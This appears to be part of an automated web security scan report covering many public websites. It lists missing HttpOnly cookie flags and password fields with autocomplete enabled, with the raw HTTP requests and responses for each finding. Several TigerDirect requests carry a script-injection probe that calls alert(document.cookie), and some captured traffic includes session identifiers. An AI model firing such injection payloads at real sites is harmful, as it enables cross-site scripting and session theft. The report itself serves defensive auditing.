Set-Cookie: _tracking=Neudesic69f18; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Set-Cookie: _campaign=direct; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Set-Cookie: _adgroup=direct; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Set-Cookie: _keyword=direct; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Set-Cookie: _ads=direct; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Set-Cookie: _visit=1; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Pragma: no-cache
Set-Cookie: _trackid=12484382; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Set-Cookie: _visitnum=1; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 0

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wpmp_switcher=desktop; expires=Mon, 30-Jan-2012 02:03:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.493. http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.terra.com
Path:	/$\|www.people.com/$\|http:/www.walmart.com/\|http:/www.walmart.com/cp/toys/4171\|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WEBTRENDS_ID=173.193.214.243-1296353013.43280; path=/; expires=Fri, 01-Jan-2016 00:02:15 GMT; domain=.terra.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.terra.com.mx
Path:	/default.htm\|http:/www.terra.com/$\|www.people.com/$\|http:/www.walmart.com/\|http:/www.walmart.com/cp/toys/4171\|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CookiePortalMX=233854160.20480.0000; expires=Sun, 30-Jan-2011 04:03:40 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.terra.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:03:40 GMT
Server: Microsoft-IIS/6.0
cache-control: no-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://buscador.terra.com.mx/404.aspx?ca=z&source=Search&query=default.htm%257Chttp%3a+www.terra.com+%24%257Cwww.people.com+%24%257Chttp%3a+www.walmart.com+%257Chttp%3a+www.walmart.com+cp+toys+4171%257Chttp%3a+www.walmart&curl=http%3a%2f%2fwww.terra.com.mx%2fdefault.htm%257Chttp%3a%2fwww.terra.com%2f%24%257Cwww.people.com%2f%24%257Chttp%3a%2fwww.walmart.com%2f%257Chttp%3a%2fwww.walmart.com%2fcp%2ftoys%2f4171%257Chttp%3a%2fwww.walmart.com%2fcp%2fElectronics%2f3944
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 592
Set-Cookie: CookiePortalMX=233854160.20480.0000; expires=Sun, 30-Jan-2011 04:03:40 GMT; path=/

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://buscador.terra.com.mx/404.aspx?ca=z&source=Search&query=default.htm%257Chttp%3a+www.terra.com+%24%257Cww
...[SNIP]...

17.495. http://www.theworkbuzz.com/employment-trends/video-interviews/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theworkbuzz.com
Path:	/employment-trends/video-interviews/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-caklakng=BFF43994C5529A7F9B0AC690658AAD29; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /employment-trends/video-interviews/ HTTP/1.1
Host: www.theworkbuzz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=300, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sat, 29 Jan 2011 23:55:31 GMT
Expires: Sun, 30 Jan 2011 00:00:31 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-caklakng=BFF43994C5529A7F9B0AC690658AAD29; path=/
Last-Modified: Sat, 29 Jan 2011 16:33:17 GMT
Content-Length: 49242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/
...[SNIP]...

17.496. http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theworkbuzz.com
Path:	/fun-stuff/your-work-soundtrack/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-caklakng=46B1EFBB3B916447A34716FB66E1BFF9; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fun-stuff/your-work-soundtrack/ HTTP/1.1
Host: www.theworkbuzz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=300, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sat, 29 Jan 2011 23:55:40 GMT
Expires: Sun, 30 Jan 2011 00:00:40 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-caklakng=46B1EFBB3B916447A34716FB66E1BFF9; path=/
Last-Modified: Sat, 29 Jan 2011 08:48:16 GMT
Content-Length: 47386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/
...[SNIP]...

17.497. http://www.tigerdirect.com/cgi-bin/icart.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tigerdirect.com
Path:	/cgi-bin/icart.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SRCCODE=WEB1101; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/
SRVR=WEBX12%2D06B; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/icart.asp HTTP/1.1
Host: www.tigerdirect.com
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pop%5Fcheck=active; visited=tempyes; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; SRVR=WEBX10%2D07A; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SRCCODE=WEB1101; SSLB=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 29 Jan 2011 15:14:42 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:14:42 GMT
Connection: close
Set-Cookie: SRCCODE=WEB1101; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/
Set-Cookie: SRVR=WEBX12%2D06B; path=/
Content-Length: 1476

<HTML>
<HEAD>
<TITLE>Your TigerDirect.com Shopping Cart</TITLE>
<META NAME="Generator" CONTENT="EditPlus">
<META NAME="Author" CONTENT="">
<META NAME="Keywords" CONTENT="">
<META NAME="Descrip
...[SNIP]...

17.498. http://www.tigerdirect.com/sectors/sweepstakes/asus/asusCoreI7Giveaway_popUnder.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tigerdirect.com
Path:	/sectors/sweepstakes/asus/asusCoreI7Giveaway_popUnder.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SRVR=WEBX10%2D07A; path=/
SRCCODE=WEB1101; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sectors/sweepstakes/asus/asusCoreI7Giveaway_popUnder.asp HTTP/1.1
Host: www.tigerdirect.com
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pop%5Fcheck=active; visited=tempyes; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SSLB=0; SRCCODE=WEB1101; SRVR=WEBX12%2D06B; ASP.NET_SessionId=kjgyls45inwxcw55ezidnd45; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44&CaptchaTextVal=9895C6C99F6C; CoreID6=35034674045812964005411&ci=90203773; CoreAt=90203773=1|1|0|0|0|0|0|0|0|0|0|0|1|1296400541||&; 90203773_clogin=l=1296400541&v=1&e=1296402343043

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Length: 802
Content-Type: text/html
Cache-Control: private
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:14:47 GMT
Connection: close
Set-Cookie: SRVR=WEBX10%2D07A; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

17.499. http://www.tigerdirect.com/secure/captcha/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tigerdirect.com
Path:	/secure/captcha/Default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44&CaptchaTextVal=9895C6C99F6C; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure/captcha/Default.aspx HTTP/1.1
Host: www.tigerdirect.com
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pop%5Fcheck=active; visited=tempyes; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; SRVR=WEBX10%2D07A; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SRCCODE=WEB1101; SSLB=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 384
Date: Sun, 30 Jan 2011 15:14:42 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ASP.NET_SessionId=kjgyls45inwxcw55ezidnd45; path=/; HttpOnly
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44&CaptchaTextVal=9895C6C99F6C; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>

...[SNIP]...

17.500. http://www.youtube.com/embed/CKZzn00w01M previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/CKZzn00w01M

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
GEO=3887f2ae992adacf44a634e80b061986cwsAAAAzVVOtwdbzTUWl9w==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.501. http://www.youtube.com/embed/mm8byzo8zWE previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/mm8byzo8zWE

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
GEO=3887f2ae992adacf44a634e80b061986cwsAAAAzVVOtwdbzTUWl9w==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:55:03 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=3887f2ae992adacf44a634e80b061986cwsAAAAzVVOtwdbzTUWl9w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 9216

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Interview with Australian Cartoonist Peter Broelman</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css">
...[SNIP]...

18. Password field with autocomplete enabled previous next
There are 54 instances of this issue:

http://digg.com/search
http://eurekalert.org/
https://login.silverlight.net/login/signin.aspx
http://msn.chemistry.com/cp/landing/44762
http://msn.chemistry.com/cp/landing/44762
http://msn.chemistry.com/cp/landing/57269
http://msn.chemistry.com/cp/landing/57269
http://msn.chemistry.com/cp/landing/57269
https://secure.scout.com/a.z
https://secure.scout.com/a.z
https://secure.scout.com/a.z
http://spacefellowship.com/
http://twitter.com/
http://twitter.com/HelenASPopkin
http://twitter.com/MichaelWann
http://twitter.com/windabenedetti
http://twitter.com/wjrothman
https://twitter.com/ToddKenreck
http://www.dailygrail.com/
http://www.delish.com/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips
http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno
http://www.facebook.com/2008/fbml
http://www.facebook.com/HelenASPopkin
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/sharer.php
http://www.facebook.com/todd.kenreck
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html
http://www.newsvine.com/
http://www.newsvine.com/_tools/user/login
https://www.newsvine.com/
https://www.newsvine.com/_nv/accounts/login
https://www.newsvine.com/_nv/accounts/msnbc/newsletters
https://www.newsvine.com/_nv/accounts/register
http://www.polls.newsvine.com/
http://www.polls.newsvine.com/_nv/cms/backyard/greenhouse
http://www.polls.newsvine.com/_nv/cms/backyard/tools
http://www.polls.newsvine.com/_nv/cms/help/faq
http://www.polls.newsvine.com/_nv/cms/info/codeOfHonor
http://www.polls.newsvine.com/_nv/cms/info/companyInfo
http://www.polls.newsvine.com/_nv/cms/info/contact
http://www.polls.newsvine.com/_nv/cms/info/copyrightPolicy
http://www.polls.newsvine.com/_nv/cms/info/jobs
http://www.polls.newsvine.com/_nv/cms/info/privacyPolicy
http://www.polls.newsvine.com/_nv/cms/info/userAgreement
http://www.polls.newsvine.com/_nv/cms/welcome
http://www.polls.newsvine.com/_vine/a
http://www.polls.newsvine.com/_vine/js/m1/vine.js
http://www.scientificamerican.com/blog/observations/
http://www.scientificamerican.com/errors/404.cfm
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.unmannedspaceflight.com/
http://www.unmannedspaceflight.com/
http://www.zacks.com/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

18.1. http://digg.com/search previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/search

Issue detail

The page contains a form with the following action URL:

http://digg.com/search

The form contains the following password field with autocomplete enabled:

password

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.2. http://eurekalert.org/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://eurekalert.org
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.eurekalert.org/login.php

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: eurekalert.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.3. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page contains a form with the following action URL:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx

The form contains the following password field with autocomplete enabled:

ctl00$mainMiddle$loginForm$txtPassword

Request

POST /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx
Cache-Control: max-age=0
Origin: https://login.silverlight.net
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253AWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524ma%2526oidt%253D2%2526ot%253DSUBMIT
Content-Length: 233

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyNjc1MTYyMTZkZO%2FafV0CJRP%2B2ILM8De2o6zEhcVm&__EVENTVALIDATION=%2FwEWAgLNm4PjCwL0iqHzAh9XOTMNktAsCvWQ8c3pqepo2pjW&ctl00%24mainMid
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:51 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:51 GMT
Content-Length: 15108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
The Of
...[SNIP]...
</p>
<form name="aspnetForm" method="post" action="signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx" onsubmit="javascript:return WebForm_OnSubmit();" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_mainMiddle_loginForm_btnLogin')" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$mainMiddle$loginForm$txtPassword" type="password" id="ctl00_mainMiddle_loginForm_txtPassword" tabindex="2" style="width:200px;" /></span>
...[SNIP]...

18.4. http://msn.chemistry.com/cp/landing/44762 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://msn.chemistry.com
Path:	/cp/landing/44762

Issue detail

The page contains a form with the following action URL:

http://msn.chemistry.com/cp/landing/44762?trackingid=516068&bannerid=2117632

The form contains the following password field with autocomplete enabled:

password

Request

GET /cp/landing/44762?trackingid=516068&bannerid=2117632 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.5. http://msn.chemistry.com/cp/landing/44762 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://msn.chemistry.com
Path:	/cp/landing/44762

Issue detail

The page contains a form with the following action URL:

http://msn.chemistry.com/cp/landing/44762

The form contains the following password field with autocomplete enabled:

password

Request

GET /cp/landing/44762 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.6. http://msn.chemistry.com/cp/landing/57269 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://msn.chemistry.com
Path:	/cp/landing/57269

Issue detail

The page contains a form with the following action URL:

http://msn.chemistry.com/cp/landing/57269

The form contains the following password field with autocomplete enabled:

password

Request

GET /cp/landing/57269 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.7. http://msn.chemistry.com/cp/landing/57269 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://msn.chemistry.com
Path:	/cp/landing/57269

Issue detail

The page contains a form with the following action URL:

http://msn.chemistry.com/cp/landing/57269?trackingid=516068&bannerid=2117936&gt1=26000

The form contains the following password field with autocomplete enabled:

password

Request

GET /cp/landing/57269?trackingid=516068&bannerid=2117936&gt1=26000 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=f00ab6b3-aecc-4459-8981-db2d0d694a4c; expires=Sun, 29-Jan-2012 23:49:10 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:10 GMT; path=/
Set-Cookie: Session=SID=673ADD47-7B69-4D31-9679-2681D209F5D8&Th=13&TID=516068; path=/
Set-Cookie: UMID=50d7f413-d359-4fff-aa18-c4bfcd946574; expires=Sun, 29-Jan-2012 23:49:10 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30079

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
 <form class="register" id="frmReg" method="POST"> <input name="hdnPROID" type="hidden" value="1"/>
...[SNIP]...
<td colspan="3"><input name="password" type="password" id="password" class="columnWidth" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:9px;" /></td>
...[SNIP]...

18.8. http://msn.chemistry.com/cp/landing/57269 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://msn.chemistry.com
Path:	/cp/landing/57269

Issue detail

The page contains a form with the following action URL:

http://msn.chemistry.com/cp/landing/57269?trackingid=516068&bannerid=2117936

The form contains the following password field with autocomplete enabled:

password

Request

GET /cp/landing/57269?trackingid=516068&bannerid=2117936 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.9. https://secure.scout.com/a.z previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.scout.com
Path:	/a.z

Issue detail

The page contains a form with the following action URL:

https://secure.scout.com/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88

The form contains the following password fields with autocomplete enabled:

Password
Password2

Request

